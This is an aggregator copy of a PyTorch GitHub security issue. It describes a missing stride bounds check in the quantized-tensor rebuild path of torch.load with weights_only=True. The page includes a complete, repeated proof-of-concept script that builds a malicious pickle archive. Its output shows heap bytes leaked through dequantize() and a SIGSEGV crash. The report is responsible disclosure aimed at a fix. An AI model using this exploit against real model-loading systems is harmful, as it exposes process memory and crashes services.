pytorch - 💡(How to fix) Fix weights_only=True returns quantized tensor with unchecked stride; downstream dequantize() reads attacker-chosen offset of process memory on torch 2.12.0

Official PRs (…)
ON THIS PAGE

Recommended Tools

×6

Utilities matched from this issue’s tags and category — try them while you read without losing context.

GitHub issue graph ai analysis

Paste a GitHub issue URL. We fetch that issue, discover linked issues from bodies/comments/timeline, collect linked pull requests, and produce a structured English report.

The report is written in English Markdown for sharing and archival.

Helpful · Quick feedback

Loading…

On torch==2.12.0+cpu (latest on PyPI, released 2026-05-13), torch.load(..., weights_only=True) returns a quantized tensor whose stride is arbitrarily large with no bounds check against the underlying storage. The first operation that materializes the tensor's data (dequantize(), int_repr(), sum(), clone(), print) reads at attacker-chosen offsets in libtorch C++. If the offset lands in mapped memory the read succeeds and process heap bytes are exposed through the returned tensor's contents. If the offset lands in unmapped memory the Python process terminates with SIGSEGV.

A 797-byte attacker-controlled archive plus one ordinary downstream call is enough.

The non-quantized rebuild path (_rebuild_tensor_v2, _rebuild_tensor_v3) enforces the bounds check that the quantized path is missing; the asymmetry is the bug.

Error Message

Symmetric with the non-quantized rebuild path: the _rebuild_tensor_v2 equivalent with the same oversized stride raises RuntimeError: Trying to resize storage that is not resizable. The quantized path should reject the same input with an equivalent error.

Root Cause

On torch==2.12.0+cpu (latest on PyPI, released 2026-05-13), torch.load(..., weights_only=True) returns a quantized tensor whose stride is arbitrarily large with no bounds check against the underlying storage. The first operation that materializes the tensor's data (dequantize(), int_repr(), sum(), clone(), print) reads at attacker-chosen offsets in libtorch C++. If the offset lands in mapped memory the read succeeds and process heap bytes are exposed through the returned tensor's contents. If the offset lands in unmapped memory the Python process terminates with SIGSEGV.

A 797-byte attacker-controlled archive plus one ordinary downstream call is enough.

The non-quantized rebuild path (_rebuild_tensor_v2, _rebuild_tensor_v3) enforces the bounds check that the quantized path is missing; the asymmetry is the bug.

Code Example

def _rebuild_qtensor(storage, storage_offset, size, stride, quantizer_params, requires_grad, backward_hooks):
    qscheme = quantizer_params[0]
    if qscheme == torch.per_tensor_affine:
        tensor = torch._empty_affine_quantized(size, scale=..., zero_point=..., dtype=storage.dtype, device=storage.device)
    elif qscheme in (torch.per_channel_affine, torch.per_channel_affine_float_qparams):
        tensor = torch._empty_per_channel_affine_quantized(size, scales=..., zero_points=..., axis=axis, dtype=..., device=...)
    ...
    tensor.set_(storage, storage_offset, size, stride)
    ...
    return tensor

---

python -m venv /tmp/v
/tmp/v/bin/pip install --index-url https://download.pytorch.org/whl/cpu torch==2.12.0

---

"""
Repro: weights_only=True returns a quantized tensor whose stride is
not bounds-checked against storage. dequantize() either leaks process
heap bytes through the output tensor (small stride) or terminates the
process with SIGSEGV (large stride).
"""
import io
import struct
import subprocess
import sys
import zipfile

import torch


def pack_int(v):
    if 0 <= v < 256:
        return b"K" + bytes([v])
    if -2**31 <= v < 2**31:
        return b"J" + struct.pack("<i", v)
    bl = max(1, (abs(v).bit_length() + 8) // 8)
    return b"\x8a" + bytes([bl]) + v.to_bytes(bl, "little", signed=True)


def build_blob(stride_b):
    parts = [b"\x80\x02", b"c", b"torch._utils\n_rebuild_qtensor\n", b"("]
    parts += [b"(", b"X", struct.pack("<i", 7), b"storage",
              b"c", b"torch\nQUInt8Storage\n",
              b"X", struct.pack("<i", 1), b"0",
              b"X", struct.pack("<i", 3), b"cpu",
              b"K", bytes([12]), b"t", b"Q"]
    parts += [b"K\x00", b"(K\x03K\x04t",
              b"(", pack_int(stride_b), b"K\x01", b"t"]
    parts += [b"(", b"c", b"torch\nper_channel_affine\n",
              b"](",
              b"G", struct.pack(">d", 0.1),
              b"G", struct.pack(">d", 0.2),
              b"G", struct.pack(">d", 0.3),
              b"e",
              b"](", b"K\x00", b"K\x01", b"K\x02", b"e",
              b"K\x00", b"t"]
    parts += [b"\x89",
              b"c", b"collections\nOrderedDict\n)R",
              b"t", b"R", b"."]
    pkl = b"".join(parts)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("archive/data.pkl", pkl)
        zf.writestr("archive/data/0", bytes(range(12)))
        zf.writestr("archive/version", b"3\n")
        zf.writestr("archive/.format_version", b"1\n")
        zf.writestr("archive/byteorder", b"little")
    return buf.getvalue()


print(f"torch {torch.__version__}", flush=True)

# Variant 1: info leak. stride small enough that the OOB offset lands in
# mapped process memory.
blob = build_blob(stride_b=2**17)
print(f"\n=== INFO LEAK (stride=2**17, {len(blob)} bytes) ===", flush=True)
r = torch.load(io.BytesIO(blob), weights_only=True)
print(f"shape={tuple(r.shape)} stride={r.stride()} storage_nbytes={r.untyped_storage().nbytes()}", flush=True)
out = r.dequantize().tolist()
print(f"row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): {out[0]}", flush=True)
print(f"row 1 (OOB read from heap): {out[1]}", flush=True)
print(f"row 2 (OOB read from heap): {out[2]}", flush=True)
# Reconstruct: out[1][j] = (uint8 - 1) * 0.2  (row 1 has scale=0.2, zero_point=1)
row1_bytes = [round(v / 0.2 + 1) for v in out[1]]
row1_ascii = "".join(chr(b) if 32 <= b < 127 else "." for b in row1_bytes)
print(f"row 1 reconstructed bytes: {row1_bytes} ASCII={row1_ascii!r}", flush=True)

# Variant 2: SIGSEGV. stride past page boundary.
blob = build_blob(stride_b=2**20)
print(f"\n=== SIGSEGV (stride=2**20, {len(blob)} bytes) ===", flush=True)
p = subprocess.run(
    [sys.executable, "-c",
     "import io,sys,torch; r=torch.load(io.BytesIO(sys.stdin.buffer.read()), weights_only=True); r.dequantize()"],
    input=blob, capture_output=True)
print(f"exit code: {p.returncode}  (negative = signal; -11 = SIGSEGV)", flush=True)

---

torch 2.12.0+cpu

=== INFO LEAK (stride=2**17, 797 bytes) ===
shape=(3, 4) stride=(131072, 1) storage_nbytes=12
row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): [0.0, 0.1, 0.2, 0.3]
row 1 (OOB read from heap): [22.6, 20.0, 20.4, 20.8]
row 2 (OOB read from heap): [-0.6, 50.7, 14.4, 56.7]
row 1 reconstructed bytes: [114, 101, 102, 103] ASCII='refg'

=== SIGSEGV (stride=2**20, 797 bytes) ===
exit code: -11
RAW_BUFFERClick to expand / collapse

🐛 Describe the bug

Originally filed as GHSA-jg6j-8w4h-2pg2 on 2026-05-20. Per maintainer guidance ("not strictly a torch.load bug per security policy, but worth fixing anyway; please do not hesitate to report it publicly, PR is coming"), opening a public issue to track the fix and to make the technical detail searchable for downstream users.

Summary

On torch==2.12.0+cpu (latest on PyPI, released 2026-05-13), torch.load(..., weights_only=True) returns a quantized tensor whose stride is arbitrarily large with no bounds check against the underlying storage. The first operation that materializes the tensor's data (dequantize(), int_repr(), sum(), clone(), print) reads at attacker-chosen offsets in libtorch C++. If the offset lands in mapped memory the read succeeds and process heap bytes are exposed through the returned tensor's contents. If the offset lands in unmapped memory the Python process terminates with SIGSEGV.

A 797-byte attacker-controlled archive plus one ordinary downstream call is enough.

The non-quantized rebuild path (_rebuild_tensor_v2, _rebuild_tensor_v3) enforces the bounds check that the quantized path is missing; the asymmetry is the bug.

Details

_rebuild_qtensor is on the weights_only allow-list. Its body in torch/_utils.py:438 accepts attacker-controlled storage, storage_offset, size, and stride arguments:

def _rebuild_qtensor(storage, storage_offset, size, stride, quantizer_params, requires_grad, backward_hooks):
    qscheme = quantizer_params[0]
    if qscheme == torch.per_tensor_affine:
        tensor = torch._empty_affine_quantized(size, scale=..., zero_point=..., dtype=storage.dtype, device=storage.device)
    elif qscheme in (torch.per_channel_affine, torch.per_channel_affine_float_qparams):
        tensor = torch._empty_per_channel_affine_quantized(size, scales=..., zero_points=..., axis=axis, dtype=..., device=...)
    ...
    tensor.set_(storage, storage_offset, size, stride)
    ...
    return tensor

For the non-quantized path the equivalent set_ invocation (reached via _rebuild_tensor_v2 in the same file) starts with t = torch.empty((0,), dtype=storage.dtype, ...) and then calls t.set_(storage._untyped_storage, storage_offset, size, stride). The C++ implementation enforces the invariant storage_offset + sum((size[i]-1) * stride[i]) * element_size <= storage.nbytes. A _rebuild_tensor_v2 call with stride=(2**20, 1) and a 12-byte storage raises RuntimeError: Trying to resize storage that is not resizable.

The quantized path constructs the starting tensor through torch._empty_per_channel_affine_quantized(size, ...), which is not the empty-shape path. The subsequent tensor.set_(storage, storage_offset, size, stride) proceeds without the same bounds check, and the returned tensor carries the attacker-chosen stride over a 12-byte storage. The next operation that walks the tensor's strided layout reads storage_addr + i*stride*element_size + j*element_size for each (i, j) in size. For i > 0 with stride[0] large, the address is far outside the storage.

The OOB read is observable through the tensor's contents. For per-channel-affine dequantization, the formula (uint8_at_offset - zero_point[i]) * scale[i] exposes the byte at the OOB offset to the caller. The attacker chooses scale[i] and zero_point[i], so the byte value is reconstructible from the output. I verified this by reconstructing ASCII text fragments ("pack", "pyth", "meta", "/tmp" prefixes) from the dequantize output across multiple runs.

Reproducer

Setup:

python -m venv /tmp/v
/tmp/v/bin/pip install --index-url https://download.pytorch.org/whl/cpu torch==2.12.0

Self-contained. Constructs the malicious archive in memory; no filesystem writes, no network.

"""
Repro: weights_only=True returns a quantized tensor whose stride is
not bounds-checked against storage. dequantize() either leaks process
heap bytes through the output tensor (small stride) or terminates the
process with SIGSEGV (large stride).
"""
import io
import struct
import subprocess
import sys
import zipfile

import torch


def pack_int(v):
    if 0 <= v < 256:
        return b"K" + bytes([v])
    if -2**31 <= v < 2**31:
        return b"J" + struct.pack("<i", v)
    bl = max(1, (abs(v).bit_length() + 8) // 8)
    return b"\x8a" + bytes([bl]) + v.to_bytes(bl, "little", signed=True)


def build_blob(stride_b):
    parts = [b"\x80\x02", b"c", b"torch._utils\n_rebuild_qtensor\n", b"("]
    parts += [b"(", b"X", struct.pack("<i", 7), b"storage",
              b"c", b"torch\nQUInt8Storage\n",
              b"X", struct.pack("<i", 1), b"0",
              b"X", struct.pack("<i", 3), b"cpu",
              b"K", bytes([12]), b"t", b"Q"]
    parts += [b"K\x00", b"(K\x03K\x04t",
              b"(", pack_int(stride_b), b"K\x01", b"t"]
    parts += [b"(", b"c", b"torch\nper_channel_affine\n",
              b"](",
              b"G", struct.pack(">d", 0.1),
              b"G", struct.pack(">d", 0.2),
              b"G", struct.pack(">d", 0.3),
              b"e",
              b"](", b"K\x00", b"K\x01", b"K\x02", b"e",
              b"K\x00", b"t"]
    parts += [b"\x89",
              b"c", b"collections\nOrderedDict\n)R",
              b"t", b"R", b"."]
    pkl = b"".join(parts)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("archive/data.pkl", pkl)
        zf.writestr("archive/data/0", bytes(range(12)))
        zf.writestr("archive/version", b"3\n")
        zf.writestr("archive/.format_version", b"1\n")
        zf.writestr("archive/byteorder", b"little")
    return buf.getvalue()


print(f"torch {torch.__version__}", flush=True)

# Variant 1: info leak. stride small enough that the OOB offset lands in
# mapped process memory.
blob = build_blob(stride_b=2**17)
print(f"\n=== INFO LEAK (stride=2**17, {len(blob)} bytes) ===", flush=True)
r = torch.load(io.BytesIO(blob), weights_only=True)
print(f"shape={tuple(r.shape)} stride={r.stride()} storage_nbytes={r.untyped_storage().nbytes()}", flush=True)
out = r.dequantize().tolist()
print(f"row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): {out[0]}", flush=True)
print(f"row 1 (OOB read from heap): {out[1]}", flush=True)
print(f"row 2 (OOB read from heap): {out[2]}", flush=True)
# Reconstruct: out[1][j] = (uint8 - 1) * 0.2  (row 1 has scale=0.2, zero_point=1)
row1_bytes = [round(v / 0.2 + 1) for v in out[1]]
row1_ascii = "".join(chr(b) if 32 <= b < 127 else "." for b in row1_bytes)
print(f"row 1 reconstructed bytes: {row1_bytes} ASCII={row1_ascii!r}", flush=True)

# Variant 2: SIGSEGV. stride past page boundary.
blob = build_blob(stride_b=2**20)
print(f"\n=== SIGSEGV (stride=2**20, {len(blob)} bytes) ===", flush=True)
p = subprocess.run(
    [sys.executable, "-c",
     "import io,sys,torch; r=torch.load(io.BytesIO(sys.stdin.buffer.read()), weights_only=True); r.dequantize()"],
    input=blob, capture_output=True)
print(f"exit code: {p.returncode}  (negative = signal; -11 = SIGSEGV)", flush=True)

Expected output on a fresh pip install torch==2.12.0 venv (the leaked bytes vary across runs due to ASLR; the values shown were observed in my environment):

torch 2.12.0+cpu

=== INFO LEAK (stride=2**17, 797 bytes) ===
shape=(3, 4) stride=(131072, 1) storage_nbytes=12
row 0 (in-bounds, expected ~ [0, 0.1, 0.2, 0.3]): [0.0, 0.1, 0.2, 0.3]
row 1 (OOB read from heap): [22.6, 20.0, 20.4, 20.8]
row 2 (OOB read from heap): [-0.6, 50.7, 14.4, 56.7]
row 1 reconstructed bytes: [114, 101, 102, 103] ASCII='refg'

=== SIGSEGV (stride=2**20, 797 bytes) ===
exit code: -11

The four bytes [114, 101, 102, 103] decode to the ASCII string refg, a fragment of Python heap memory. The leaked bytes vary across runs due to ASLR; the values shown were observed in my environment. Different runs expose different memory regions including file path fragments ("/tmp"), Python identifier strings ("pack", "pyth", "meta"), and arbitrary heap pointers. The attacker chooses the OOB offset through the stride_b argument in the archive.

Expected behavior

Symmetric with the non-quantized rebuild path: the _rebuild_tensor_v2 equivalent with the same oversized stride raises RuntimeError: Trying to resize storage that is not resizable. The quantized path should reject the same input with an equivalent error.

Cross-version

Reproduced on torch==2.7.1+cu118. The dense vs quantized asymmetry is consistent across the versions tested. Affected: <= 2.12.0.

I did not find a path to attacker-controlled writes. Quantized fill_, copy_, and index_put_ all reject the OOB-strided tensor at the setStorage boundary inside libtorch.

Suggested fix direction

Add the same bounds check to the quantized set_ path that the non-quantized path already enforces. The invariant storage_offset + sum((size[i]-1) * stride[i]) * element_size <= storage.nbytes should hold regardless of the tensor's quantization state. Alternatively, validate the stride argument inside _rebuild_qtensor itself before calling tensor.set_(storage, storage_offset, size, stride).

Versions tested: 2.7.1+cu118, 2.12.0+cpu.

Versions

Collecting environment information... PyTorch version: 2.12.0+cpu Is debug build: False CUDA used to build PyTorch: None ROCM used to build PyTorch: N/A

OS: Ubuntu 22.04.5 LTS (x86_64) GCC version: (Ubuntu 11.4.0-1ubuntu1~22.04.3) 11.4.0 Clang version: 14.0.0-1ubuntu1.1 CMake version: version 3.22.1 Libc version: glibc-2.35

Python version: 3.10.12 (main, Mar 3 2026, 11:56:32) [GCC 11.4.0] (64-bit runtime) Python platform: Linux-6.8.0-90-generic-x86_64-with-glibc2.35 Is CUDA available: False CUDA runtime version: No CUDA CUDA_MODULE_LOADING set to: N/A GPU models and configuration: No CUDA Nvidia driver version: No CUDA cuDNN version: No CUDA Is XPU available: False HIP runtime version: N/A MIOpen runtime version: N/A Is XNNPACK available: True Caching allocator config: N/A

CPU: Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Address sizes: 48 bits physical, 48 bits virtual Byte Order: Little Endian CPU(s): 12 On-line CPU(s) list: 0-11 Vendor ID: AuthenticAMD Model name: AMD Ryzen 5 5600X 6-Core Processor CPU family: 25 Model: 33 Thread(s) per core: 2 Core(s) per socket: 6 Socket(s): 1 Stepping: 0 Frequency boost: enabled CPU max MHz: 3700.0000 CPU min MHz: 2200.0000 BogoMIPS: 7399.86 L1d cache: 192 KiB (6 instances) L1i cache: 192 KiB (6 instances) L2 cache: 3 MiB (6 instances) L3 cache: 32 MiB (1 instance) NUMA node(s): 1 NUMA node0 CPU(s): 0-11

Versions of relevant libraries: [pip3] numpy==2.2.6 [pip3] torch==2.12.0+cpu [conda] Could not collect

cc @mruberry @mikaylagawarecki

Vote matrix · Quick signals

Works
Did the solution work? Tap to confirm.
Easy Fix
Was it a quick fix?
Time Saver
Did it save you time?
Blocking
Was it severely blocking?
Common Issue
Are others likely hitting this too?
Flaky / Intermittent
Is it intermittent?
Verified / Reproducible
Can you reproduce it reliably?
Loading…

FAQ

Expected behavior

Symmetric with the non-quantized rebuild path: the _rebuild_tensor_v2 equivalent with the same oversized stride raises RuntimeError: Trying to resize storage that is not resizable. The quantized path should reject the same input with an equivalent error.

Still need to ship something?

×6

Another batch ranked right after the header list — different links, same matching logic.

Back to top recommendations

TRENDING